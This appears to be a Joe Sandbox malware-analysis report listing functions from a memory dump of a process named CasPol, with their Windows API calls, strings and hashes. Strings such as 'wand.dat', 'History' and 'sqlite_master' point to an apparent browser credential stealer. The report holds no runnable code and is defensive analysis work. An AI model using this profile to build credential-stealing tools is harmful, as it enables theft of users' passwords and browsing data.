                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT ref: 0041D8CB
• memcmp.MSVCRT ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• Cannot add a column to a view, xrefs: 0042EBE8
• virtual tables may not be altered, xrefs: 0042EBD2
• sqlite_altertab_%s, xrefs: 0042EC4C
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT(?), ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
APIs
• free.MSVCRT ref: 0040F561
• memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
• memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$free
• String ID: g4@
• API String ID: 2888793982-2133833424
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
